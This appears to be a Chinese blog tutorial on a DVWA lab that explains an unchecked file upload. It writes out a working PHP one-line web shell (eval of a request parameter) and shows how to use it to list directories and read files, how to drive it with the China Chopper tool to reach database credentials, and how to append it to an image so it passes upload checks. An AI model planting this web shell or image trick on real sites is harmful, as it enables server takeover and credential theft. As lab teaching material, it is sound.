网络安全:文件上传 + 一句话木马原理 + 菜刀的简单使用

  • Post author:
  • Post category:其他


很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸。

这里的疏忽是指,不对用户上传的内容进行检查。

仍旧以DVWA为例:

网站的本意是接受用户的图片(image),但后台代码却并没有对文件进行检测:

网页源码(部分截图):

php处理源码:

文本也贴出来:

File Upload Source
vulnerabilities/upload/source/low.php
<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?> 


我们可以看到,target_path只是获得了文件应该存放的路径。之后的步骤,并未对文件进行任何的检测处理,而直接进行move_uploaded_file(),将文件上传。

换句话说,你的文件不是图片都莫得问题。

试一下,我们上传个php一句话。许多小伙伴可能听说过“一句话木马”这个名词,也见过一句话木马怎么写,但是就不知道为什么起作用。别急,我们简单一聊就通了。没听说过的小伙伴也不用担心,注重听原理。

新建个txt,编辑:

<?php
    @eval($_REQUEST["shell"]);
?>

保存后修改扩展名为.php。(我这里起名为shell)

进行上传:

然后我们会发现successfully upload。上传成功!竟然还给出了路径。路径中的“..”指上一目录。

shell.php被上传到了根目录下hackable/uploads/shell.php。

我们直接通过修改url对其进行访问:

你会发现网页什么都没有显示,但是并没有报错。这说明文件确实存在,只是无显示内容。

一句话木马如何使用?

<?php
@eval($_REQUEST['shell']);
?>

重点在@eval($_REQUEST[‘shell’])的理解。

首先是一个@符号,其实这个东西对我们来说可有可无,这个符号的作用是抵制错误提示。

为什么要抵制错误提示呢?这里先要了解eval()函数的功能。eval将接收一个字符串参数,并将这个字符串作为命令语句执行。

如:

<?php

    echo "hello";
    eval('echo "hello"');

?>

这两句的功能是相同的,因为eval接收的是个字符串,那这个字符串就有可能不是正确的命令。这样一来直接执行就会报错,为了不显示报错信息,前面加上了@符号。

@一般是创建网站的人才会使用,旨在不让用户从报错信息中获得服务器的相关信息。而我们对一句话进行利用时,有时还是需要报错信息来告诉我们,哪里输错了。

最后看eval中的参数:$_REQUEST[‘shell’],request是请求,最常用的请求方式有两种GET和POST(不了解的,前面很多文章里都有谈到,STW也可以。【我就不加F了】)。而$_REQUEST就是从请求参数中得到“shell”这个参数的值(当然这个参数名你可以随便起,反正是你来利用。)。

如果是$_GET[“shell”],就是从get请求的参数中找shell参数。而$_POST[“shell”],则是从post请求中寻找shell参数。$_REQUEST包含get和post,两者皆可。

到这里,一句话的功能应该就已经清晰了,即从get或post请求参数中,将shell参数的值,作为命令语句执行。

如何利用呢?

为了方便,我们就不抓包(截获报文)了。直接通过get方式向文件发送参数:

修改url,其后添加?shell=xxxxx,来传递shell参数。其值为phpinfo()。

phpinfo()函数会显示服务器的详细信息。然而页面报错了,syntax error(语法错误)。我们发现phpinfo()后面忘记了分号。这就显示了报错的好处,如果一句话中eval前有@符号,这时的页面会是一片空白,让你一头雾水。

添加分号后正确执行了phpinfo函数,页面上显示了诸多服务器信息,操作系统信息,项目路径等等。

这是一个简单的使用实例,还有没有其他的利用呢?

修改shell值为echo(__DIR__);,echo大家都清楚,就是print。而__DIR__指当前文件目录。通过它,我们知道了shell.php被上传到了什么位置。在uploads目录之下。

那看看uploads目录下面都有什么吧。

修改shell=print_r(scandir(__DIR__));,scandir函数扫描指定路径下的文件,返回一个数组。echo只能简单输出字符串,对于复杂结构显得力不从心,所以这里利用了print_r函数。

通过结果我们知道,在uploads目录下,除了shell.php,还有一张dvwa_email.png的图片。

我们实际打开项目:

确实如此。

我们还可以读取文件内容,修改shell值shell=echo(file_get_contents(“./shell.php”));:

file_get_contents函数获得指定文件的内容:

因为文件内容是php代码段,不是可显示内容,所以页面空白。但是,这时你右键查看源码或者快捷键ctrl + u:

你就能看到shell.php的内容了。

致此,一句话的利用原理就明白了。来了个问题,一句话利用不就是传递一个参数值,并让服务器执行吗。有没有工具能替我做这些机械性的工作呢。例如我想要得到这个项目的目录结果,我需要一点点的扫描每个子目录,手动做起来太麻烦了。

这就是要说到的“中国菜刀”的功能。可能很多小朋友听过这个工具:

初始界面:

右键添加:

地址当然就是我们上传的php文件的url了,后面那个框里是参数名,我们设置的是shell。菜刀就会帮你向那个地址发送shell参数,以解放你的双手。

点击添加后:

双击添加的链接:

是不是太恐怖了,这个网站的项目目录尽显眼前。

如果权限允许,你甚至可以随意下载它的东西:

双击文件查看内容:

完了,现在数据库的用户名密码,我也知道了:

此话题致此结束吧,这就是一句话的利用。

返回我们最开始的问题,这一切的一切,都是因为,服务器未对我们上传的文件进行检查。

如果服务器对上传文件进行了限制,比如,只能上传jpg文件,那我们还有方法上传一句话的脚本吗?

有!有种方式叫图片隐藏,更多的可能称为“图片马”。即将php脚本嵌入到图片的末尾。

这里有之前写过的用python实现的方法,其中有原理解释,感兴趣的可以看下:


https://blog.csdn.net/qq_41500251/article/details/91645290

简单点,我们这样搞:

准备好一张图片和我们刚刚写的php脚本。打开cmd:

copy 1.jpg/b + shell.php/a 2.jpg

复制文件,图片后面添加脚本,注意打开方式,图片用二进制方式打开/b,php用文本(或者说ascii)方式打开/a。

命令执行成功后,我们会得到一个合并了的2.jpg图片。现在我们要做的就是让网页用文本的方式显示2.jpg。前面1.jpg图片的部分会是一堆十六进制数字,无所谓不重要。图片后面的东西,就是我们的php脚本。只要网页能输出,剩下的就和我们直接上传php无二样了。

你如果有能用十六进制打开文件的工具,可以查看下2.jpg的末尾部分,你会发出“哦~”的一声。

至于怎么让网页显示出来,这设计到另一个问题——文件包含,我们另外谈。

结束吧,至少标题列出来的全说了一遍。



版权声明:本文为qq_41500251原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。